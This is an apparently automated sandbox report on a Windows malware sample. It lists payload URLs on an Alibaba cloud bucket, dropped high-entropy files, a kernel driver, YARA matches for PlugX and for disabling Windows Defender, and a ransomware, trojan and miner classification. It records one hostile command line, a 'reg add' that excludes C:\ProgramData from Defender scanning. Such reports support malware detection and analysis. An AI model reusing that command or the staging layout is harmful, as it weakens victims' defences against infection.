                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.pngfH
                Source: DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AA9000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/extra-task2.png
                Source: DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/extra-task2.pngI
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/m
                Source: DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/n
                Source: lBoqoqIC.exe, 00000031.00000002.3348959801.0000000000786000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002BB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.png
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002BB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.png%95b9
                Source: lBoqoqIC.exe, 00000031.00000002.3348959801.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.png-
                Source: lBoqoqIC.exe, 00000031.00000002.3348959801.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.pngT
                Source: lBoqoqIC.exe, 00000031.00000002.3348959801.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.pngck
                Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: lBoqoqIC.exe.42.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: https://www.globalsign.com/repository/06
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownHTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.8:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.2.8:49990 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.2.8:49994 version: TLS 1.2
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00402C94 GetAsyncKeyState,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,49_2_00402C94
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C8744 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,49_2_004C8744
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004D188E GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,49_2_004D188E
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004D18A3 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,49_2_004D18A3
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004CAEAD GetKeyState,GetKeyState,GetKeyState,GetKeyState,49_2_004CAEAD

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Writes many files with high entropy
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\d[1].gif entropy: 7.9954955896Jump to dropped file
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\Documents\MsMpList.dat entropy: 7.99993875511Jump to dropped file
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\a[1].gif entropy: 7.99530439254Jump to dropped file
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\b[1].gif entropy: 7.99352271294Jump to dropped file
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\drops[1].jpg entropy: 7.99178106276Jump to dropped file
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\FOM-50[1].jpg entropy: 7.99273647747Jump to dropped file
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\FOM-51[1].jpg entropy: 7.99995626102Jump to dropped file
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Program Files (x86)\DfP1K3\tbcore3U.dll entropy: 7.99251721315Jump to dropped file
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\FOM-52[1].jpg entropy: 7.99951889252Jump to dropped file
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Program Files (x86)\DfP1K3\log.src entropy: 7.99995522519Jump to dropped file
                Source: C:\Users\user\Documents\l0tiFM.exeFile created: C:\Program Files (x86)\DfP1K3\utils.vcxproj entropy: 7.99939956496Jump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\dsb-hr2[1].png entropy: 7.99718672167Jump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\ProgramData\efk2JUeS\lBoqoqIC.dat entropy: 7.99488264959Jump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\dsb-hr3[1].png entropy: 7.99947389782Jump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\ProgramData\efk2JUeS\lBoqoqIC.png entropy: 7.99936711612Jump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\dsb-hr1[1].png entropy: 7.99964943719Jump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Program Files (x86)\3q7mMte5\log.src entropy: 7.9999552261Jump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Program Files (x86)\3q7mMte5\tbcore3U.dll entropy: 7.99251660296Jump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Program Files (x86)\3q7mMte5\utils.vcxproj entropy: 7.99939967013Jump to dropped file
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\extra-task2[1].png entropy: 7.99990094954Jump to dropped file
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\page-404[1].png entropy: 7.99974552668Jump to dropped file

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 6.2.l0tiFM.exe.2800000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                Source: 42.2.DfP1K3.exe.32a0000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                Source: Process Memory Space: DfP1K3.exe PID: 7124, type: MEMORYSTRMatched rule: PlugX Identifying Strings Author: Seth Hardy
                Drops password protected ZIP file
                Source: lBoqoqIC.dat.42.drZip Entry: encrypted
                Source: lBoqoqIC.dat.42.drZip Entry: encrypted
                Source: lBoqoqIC.dat.42.drZip Entry: encrypted
                Source: lBoqoqIC.dat.42.drZip Entry: encrypted
                PE file contains section with special chars
                Source: tbcore3U.dll.7.drStatic PE information: section name: .%?.
                Source: tbcore3U.dll.7.drStatic PE information: section name: .%-[
                Source: tbcore3U.dll.7.drStatic PE information: section name: .mo:
                Source: 53jGFr5v.exe.42.drStatic PE information: section name: .1Q[
                Source: 53jGFr5v.exe.42.drStatic PE information: section name: .),E
                Source: 53jGFr5v.exe.42.drStatic PE information: section name: .sc=
                Source: tbcore3U.dll.42.drStatic PE information: section name: .%?.
                Source: tbcore3U.dll.42.drStatic PE information: section name: .%-[
                Source: tbcore3U.dll.42.drStatic PE information: section name: .mo:
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140006C95 NtAllocateVirtualMemory,6_2_0000000140006C95
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C6A59 NtdllDefWindowProc_A,49_2_004C6A59
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C728C NtdllDefWindowProc_A,CallWindowProcA,49_2_004C728C
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C8F92 NtdllDefWindowProc_A,49_2_004C8F92
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C764B wsprintfA,wsprintfA,GetClassInfoA,NtdllDefWindowProc_A,49_2_004C764B
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C763B wsprintfA,GetClassInfoA,NtdllDefWindowProc_A,49_2_004C763B
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00429E78: __EH_prolog,SetFileAttributesA,CreateFileA,DeviceIoControl,CloseHandle,49_2_00429E78
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0043A30A __EH_prolog,GetVersionExA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,MessageBoxA,49_2_0043A30A
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_000000014000C3F06_2_000000014000C3F0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_000000014000CC006_2_000000014000CC00
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140001A306_2_0000000140001A30
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_000000014000C2A06_2_000000014000C2A0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00000001400022C06_2_00000001400022C0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00000001400110F06_2_00000001400110F0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140010CF06_2_0000000140010CF0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00000001400093006_2_0000000140009300
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_000000014000BB706_2_000000014000BB70
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140003F806_2_0000000140003F80
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00000001400103D06_2_00000001400103D0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00007FFBC320A1B86_2_00007FFBC320A1B8
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00007FFBC32102486_2_00007FFBC3210248
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCode function: 44_2_00844AE244_2_00844AE2
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0042103048_2_00421030
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0042103048_2_00421030
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004F807548_2_004F8075
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0047900F48_2_0047900F
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_005AE03748_2_005AE037
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004CE03348_2_004CE033
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0047603848_2_00476038
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004890E148_2_004890E1
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004F60F648_2_004F60F6
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0047609948_2_00476099
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0049815B48_2_0049815B
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004E613F48_2_004E613F
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0047A1D348_2_0047A1D3
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0048A1AC48_2_0048A1AC
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004E61A348_2_004E61A3
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004FB1BD48_2_004FB1BD
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004D21B548_2_004D21B5
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0047523A48_2_0047523A
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0067C2E748_2_0067C2E7
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004C928148_2_004C9281
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004CD2A748_2_004CD2A7
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004F034248_2_004F0342
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0047336A48_2_0047336A
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004EC30D48_2_004EC30D
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004A431B48_2_004A431B
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0048B32848_2_0048B328
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004CD33048_2_004CD330
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004D640948_2_004D6409
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0047E41548_2_0047E415
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0049D41A48_2_0049D41A
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004F341648_2_004F3416
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004C942D48_2_004C942D
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004F14FD48_2_004F14FD
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0048855348_2_00488553
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004B350F48_2_004B350F
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0042C5C048_2_0042C5C0
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0047A59448_2_0047A594
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004A159148_2_004A1591
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004AD66548_2_004AD665
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004FF61448_2_004FF614
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004B66CB48_2_004B66CB
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004256EB48_2_004256EB
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004776FA48_2_004776FA
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0047669E48_2_0047669E
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004726BC48_2_004726BC
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0049574B48_2_0049574B
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0049175448_2_00491754
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0043170C48_2_0043170C
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004CA7C248_2_004CA7C2
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004B079C48_2_004B079C
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0047980348_2_00479803
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0048581748_2_00485817
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0048582248_2_00485822
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004848C648_2_004848C6
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0042288048_2_00422880
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004BB88648_2_004BB886
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0048E98B48_2_0048E98B
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0048A9BC48_2_0048A9BC
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004E89B648_2_004E89B6
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004D29B748_2_004D29B7
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0042CA5848_2_0042CA58
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004E8A2848_2_004E8A28
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0049DAF548_2_0049DAF5
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0047AA8E48_2_0047AA8E
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004C8A9F48_2_004C8A9F
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004C6B9948_2_004C6B99
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004F8BA348_2_004F8BA3
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004F1C0D48_2_004F1C0D
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004ACC1448_2_004ACC14
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0049ACBE48_2_0049ACBE
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_00479D2548_2_00479D25
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004F4D2948_2_004F4D29
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_00496DF448_2_00496DF4
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004ADE4A48_2_004ADE4A
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0042FEAC48_2_0042FEAC
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_00494F4C48_2_00494F4C
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0048BF3F48_2_0048BF3F
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004B5FCB48_2_004B5FCB
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0042FFCC48_2_0042FFCC
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004E3FEA48_2_004E3FEA
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_00473F9F48_2_00473F9F
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004EBFB448_2_004EBFB4
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0049E98049_2_0049E980
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C78B149_2_004C78B1
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A403049_2_004A4030
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004942A049_2_004942A0
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C05E449_2_004C05E4
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A473049_2_004A4730
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0044884249_2_00448842
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004B491049_2_004B4910
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A4CE049_2_004A4CE0
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A529049_2_004A5290
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0049549049_2_00495490
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0049D7A049_2_0049D7A0
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A580049_2_004A5800
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0041DA7F49_2_0041DA7F
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00499DC049_2_00499DC0
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0040609C49_2_0040609C
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A615049_2_004A6150
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0048224049_2_00482240
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0040640D49_2_0040640D
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0048B08049_2_0048B080
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0048B6BD49_2_0048B6BD
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0049771049_2_00497710
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004B77E849_2_004B77E8
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A399049_2_004A3990
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0048B9B249_2_0048B9B2
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0048BC1B49_2_0048BC1B
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0044BCF549_2_0044BCF5
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0048BD7B49_2_0048BD7B
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000112049_2_10001120
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000556049_2_10005560
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_10001D7049_2_10001D70
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_100034F049_2_100034F0
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000D24F49_2_1000D24F
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000D48149_2_1000D481
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_100186AC49_2_100186AC
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1001473049_2_10014730
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_100187CC49_2_100187CC
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1001A55049_2_1001A550
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000695049_2_10006950
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: String function: 004AF56E appears 90 times
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: String function: 004C5F18 appears 855 times
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: String function: 004C2C3A appears 152 times
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: String function: 004C50D5 appears 57 times
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: String function: 004815F0 appears 320 times
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: String function: 100097C0 appears 32 times
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: String function: 004AEF44 appears 1331 times
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: String function: 00476582 appears 60 times
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: String function: 00482C60 appears 35 times
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: String function: 004C6033 appears 132 times
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: String function: 004C5178 appears 42 times
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: String function: 00474BD8 appears 89 times
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: String function: 004AF01B appears 31 times
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                Source: 6.2.l0tiFM.exe.2800000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: 42.2.DfP1K3.exe.32a0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: Process Memory Space: DfP1K3.exe PID: 7124, type: MEMORYSTRMatched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12
                Source: 189atohci.sys.0.drBinary string: \Device\Driver\
                Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
                Source: classification engineClassification label: mal100.rans.troj.evad.mine.winEXE@68/43@16/5
